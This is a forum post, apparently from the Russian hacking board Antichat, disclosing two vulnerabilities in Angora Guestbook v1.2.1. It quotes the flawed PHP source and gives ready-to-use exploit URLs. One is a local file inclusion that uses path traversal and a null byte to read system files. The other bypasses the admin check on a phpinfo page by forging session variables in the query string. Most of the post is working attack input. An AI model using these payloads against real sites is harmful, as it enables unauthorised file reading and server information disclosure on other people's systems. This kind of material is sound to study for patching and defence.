06.02.2010, 23:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Angora Guestbook v1.2.1
http://sourceforge.net/projects/aguestbook/
index.php
PHP код:
// Language settings
$langName = secureVar($_GET['l'], 'html');
if (! empty($langName))
$_SESSION['langName'] = $langName;
if (empty($_SESSION['langName']))
$langName = $config['guestbookLang'];
else
$langName = $_SESSION['langName'];
@include_once "languages/" . $langName . "/frontend.php";
classes/functions.php
PHP код:
function secureVar($var, $type) {
global $con;
switch ($type) {
case 'sql' :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
break;
case 'html' :
$var = htmlspecialchars($var, ENT_QUOTES);
break;
default :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
}
return $var;
}
LFI
mq=off
http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00
------------------------
admin/includes/content/phpinfo.php
PHP код:
if (@$magic != "0xDEADBEEF")
die("This file cannot be executed directly");
if (base64_decode($_SESSION['privilege']) != 1) {
$error = new Error($lang['noPermission']);
die($error->showError());
}
ob_start();
phpinfo();
phpinfo
http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==
|
|
|